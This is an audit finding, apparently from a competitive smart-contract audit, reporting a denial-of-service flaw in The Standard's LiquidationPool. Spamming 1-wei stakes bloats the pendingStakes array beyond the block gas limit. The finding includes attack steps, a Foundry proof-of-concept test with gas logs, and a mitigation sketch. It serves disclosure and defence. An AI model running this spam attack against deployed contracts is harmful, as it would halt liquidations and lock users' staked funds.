The Standard

DeFi, Hardhat
20,000 USDC
Submission Details
Severity: high
Valid

`LiquidationPool::increasePosition` can be spammed to make `LiquidationPool::pendingStakes` too big, causing a Denial of Service on increasing and decreasing positions and on liquidations

Summary

An attacker can perform a Denial of Service attack on the protocol.

By spamming the `LiquidationPool::increasePosition` function with just 1 wei worth of EUROs or TST, an attacker can create a large number of `pendingStakes` entries. This makes the gas cost of looping through the `pendingStakes` array exceed the block gas limit.

The `pendingStakes` array is looped through in the following functions:

- `LiquidationPool::consolidatePendingStakes()`
- `LiquidationPool::getTstTotal()`

Vulnerability Details

Proof of Concept:

A well-funded attacker with enough ETH for gas can DoS the protocol with the following steps.

  1. Create a contract which will spam the `LiquidationPool::increasePosition()` function.

  2. Transfer a small amount of EUROs or TST to the attack contract.

  3. Call `increasePosition` with 1 wei of TST or EUROs.

  4. If the attack completes within 24 hrs, then the Denial of Service attack is successful.

Proof of Code
```solidity
// Foundry test function; `tst` and `liquidationPool` are assumed to be set up by the test contract.
function test_SpammingIncreasePosition() external {
    uint256 GAS_PRICE = 10 gwei; // set the gas price to 10 gwei
    uint BLOCK_GAS_LIMIT = 30_000_000;
    vm.txGasPrice(GAS_PRICE);
    vm.startPrank(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266);
    tst.approve(address(liquidationPool), 1000 ether);

    uint gasUsed;              // gas consumed by the most recent call
    uint gasConsumedForAttack; // cumulative gas over all calls
    uint tstOrEuroNeed;        // number of 1-wei deposits made

    // Keep adding 1-wei stakes until a single call costs more than the block gas limit.
    while (gasUsed <= BLOCK_GAS_LIMIT) {
        uint priorGas = gasleft();
        liquidationPool.increasePosition(1, 0);
        uint postGas = gasleft();
        uint _gasUsed = priorGas - postGas;
        gasUsed = _gasUsed;
        gasConsumedForAttack += _gasUsed;
        tstOrEuroNeed++;
    }

    console2.log("Gas used- ", gasUsed);
    console2.log("Gas cost in wei- ", gasUsed * GAS_PRICE);
    // Value is gas * gas price, i.e. wei; label matches the logged output.
    console2.log("Wei needed for attack- ", gasConsumedForAttack * GAS_PRICE);
    console2.log("TST or Euro needed in Wei- ", tstOrEuroNeed);
    vm.stopPrank();
}
```

Results

```
Logs:
Gas used- 30001910
Gas cost in wei- 300019100000000000
Wei needed for attack- 2410322635710000000000
TST or Euro needed in Wei- 18058
```

Impact

This creates a Denial of Service on the following functions:

- `LiquidationPool::increasePosition()`
- `LiquidationPool::decreasePosition()`
- `LiquidationPool::distributeFees()`
- `LiquidationPool::distributeAssets()`

This stops all liquidations of the collateral in smartVaults, leading to bad debt throughout the system.

It also affects increasing and decreasing staking positions in the LiquidationPool contract, leaving the staked assets stuck in the contract.

Tools Used

Foundry
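
One way to remove the two unbounded loops this finding names (`consolidatePendingStakes()` and `getTstTotal()`), shown as an added sketch that is not The Standard's code or a fix the project adopted. The contract name `BoundedStakePool`, the `MIN_STAKE` floor, the per-holder `consolidate` function and the one-day maturity (inferred from the 24-hour window above) are assumptions, and only TST is modelled.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added illustration, not The Standard's contract. Token transfers, EUROs
// accounting and reward distribution are left out; all names are hypothetical.
contract BoundedStakePool {
    struct Pending { uint256 createdAt; uint256 tst; }

    uint256 public constant MIN_STAKE = 1 ether; // assumed floor; rejects 1-wei deposits
    uint256 public tstTotal;                      // running total, so no loop is needed to sum stakes
    mapping(address => Pending) public pending;   // one slot per holder, never iterated
    mapping(address => uint256) public staked;

    error StakeTooSmall();

    // Moves one holder's matured pending stake into their position.
    // Cost is constant: it does not depend on how many other stakes exist.
    function consolidate(address holder) public {
        Pending memory p = pending[holder];
        if (p.tst != 0 && block.timestamp >= p.createdAt + 1 days) {
            staked[holder] += p.tst;
            delete pending[holder];
        }
    }

    function increasePosition(uint256 tstVal) external {
        if (tstVal < MIN_STAKE) revert StakeTooSmall();
        consolidate(msg.sender);                 // touches only the caller's slot
        Pending storage p = pending[msg.sender];
        p.tst += tstVal;                         // repeat deposits merge into the same slot
        p.createdAt = block.timestamp;           // and restart that holder's waiting period
        tstTotal += tstVal;
        // The TST transfer from msg.sender to this contract would go here.
    }
}
```

Because no function iterates over pending stakes, repeated deposits from one address or from many addresses leave every other user's gas cost unchanged, and the floor makes each deposit cost real capital rather than 1 wei.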

Updates

Lead Judging Commences

hrishibhat Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

pendingstake-dos

hrishibhat Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

pendingstake-high
